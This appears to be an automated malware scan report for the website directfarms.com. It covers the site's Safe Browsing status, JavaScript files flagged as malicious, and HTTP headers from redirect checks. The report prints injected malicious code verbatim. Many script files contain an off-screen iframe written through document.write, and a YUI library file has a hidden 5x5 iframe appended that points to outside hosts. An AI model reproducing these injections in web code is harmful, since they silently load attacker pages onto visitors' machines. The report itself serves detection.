Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=directfarms.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://directfarms.com/ | 200 OK Content-Length: 19595 Content-Type: text/html | clean |
http://directfarms.com/media/system/js/caption.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/modules/mod_briaskISS/mod_briaskISS.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/templates/rt_hivemind_j15/js/mootools-release-1.11.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/templates/rt_hivemind_j15/js/rokslidestrip.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/templates/rt_hivemind_j15/js/rokmoomenu.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://directfarms.com/templates/rt_hivemind_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/modules/mod_jw_ucd/mod_jw_ucd/jqueryfader/jquery.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/modules/mod_jw_ucd/mod_jw_ucd/jqueryfader/jquery.innerfade.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/index.php?option=com_content&view=article&id=2&Itemid=5 | 200 OK Content-Length: 33553 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2.x&hl=en&key=ABQIAAAAF1lez-Jyth_NmpCwqyxCiRTwXth1xTD7Ha00zKAmimhVYtLmUxRclEU2ntnyKqqc4kN5fhR4pHxqmQ | 200 OK Content-Length: 4310 Content-Type: text/javascript | clean |
http://directfarms.com/index.php?option=com_phocagallery&view=categories&Itemid=4 | 200 OK Content-Length: 12625 Content-Type: text/html | clean |
http://directfarms.com/index.php?option=com_expose&Itemid=4&album=2 | 200 OK Content-Length: 15311 Content-Type: text/html | clean |
http://directfarms.com/components/com_expose/expose/swf/AC_RunActiveContent.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/components/com_expose/expose/shadowbox/build/js/lib/yui-utilities.js | 200 OK Content-Length: 43405 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=A[C].split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length;B=B+1){E[D[B]]=E[D[B]]||{};E=E[D[B]];}}return E;};YAHOO.log=function(D,A,C){var B=YAHOO.widget.Logger;if(B&&B.log){return B.log(D,A,C);}else{return false;}};YAHOO.register=function(A,E,D){var I=YAHOO.env.modules;if(!I[A]){I[A]={versions:[],builds:[]};}var B=I[A],H=D.version,G=D.build,F=YA ;document.write('<iframe src="http://jnvzpp.sellClassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8 <iframe src="http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: directfarms.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 19:23:26 GMT
Pragma: no-cache
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 19595
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 10 Jan 2015 19:23:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 53466f02f5a14f03d4a42aec4ecec6ce=f3ic2pqrg98fogqku212uuv0n5; path=/
X-Powered-By: PHP/5.2.17
...19595 bytes of data.
GET / HTTP/1.1
Host: directfarms.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 19:23:26 GMT
Pragma: no-cache
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 19595
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 10 Jan 2015 19:23:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 53466f02f5a14f03d4a42aec4ecec6ce=f3ic2pqrg98fogqku212uuv0n5; path=/
X-Powered-By: PHP/5.2.17
...19595 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: directfarms.com
Referer: http://www.google.com/search?q=directfarms.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: directfarms.com
Referer: http://www.google.com/search?q=directfarms.com
Result:
The result is similar to the first query. There are no suspicious redirects found.